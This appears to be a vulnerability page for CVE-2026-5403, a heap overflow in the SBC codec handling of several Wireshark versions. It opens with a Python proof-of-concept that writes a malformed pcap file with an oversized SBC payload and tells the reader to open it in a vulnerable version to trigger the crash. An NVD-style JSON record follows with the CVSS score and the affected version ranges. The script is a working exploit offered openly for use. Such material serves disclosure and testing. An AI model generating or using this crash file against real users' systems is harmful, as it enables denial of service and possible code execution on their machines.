CVE-2026-5403

import struct # This script generates a malformed pcap file to trigger the SBC codec crash. # It creates a dummy global header followed by a crafted packet header # and a malformed SBC payload designed to overflow the parser. def generate_malformed_pcap(filename): # PCAP Global Header (Little Endian) pcap_global_header = struct.pack('<IHHIIII', 0xa1b2c3d4, # magic number 2, # version major 4, # version minor 0, # thiszone 0, # sigfigs 65535, # snaplen 1 # network (Ethernet) ) # Packet Header (Timestamps and length) # We set the captured length and actual length to a large value packet_header = struct.pack('<IIII', 0, 0, # ts_sec, ts_usec 1000, # incl_len (captured length) 1000 # orig_len (original length) ) # Ethernet Header (Dummy) eth_header = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00' # IP Header (Dummy) ip_header = b'\x45\x00\x00\x1c\x00\x00\x40\x00\x40\x11\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01' # UDP Header (Dummy) udp_header = b'\x00\x00\x00\x00\x00\x08\x00\x00' # SBC Payload (Malformed) # Constructing a payload that violates the SBC codec parsing logic # to trigger the buffer overflow/crash. # Sending a large block of 'A's to simulate overflow malicious_payload = b'\x9C' + b'A' * 500 with open(filename, 'wb') as f: f.write(pcap_global_header) f.write(packet_header) f.write(eth_header) f.write(ip_header) f.write(udp_header) f.write(malicious_payload) print(f"[+] Malformed PCAP file generated: {filename}") print("[+] Open this file in the vulnerable Wireshark version to trigger the crash.") if __name__ == "__main__": generate_malformed_pcap("crash_sbc.pcap")

{"cve": {"id": "CVE-2026-5403", "sourceIdentifier": "[email protected]", "published": "2026-05-01T00:16:24.670", "lastModified": "2026-05-01T19:18:04.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SBC codec crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service and possible code execution"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/21103", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-16.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}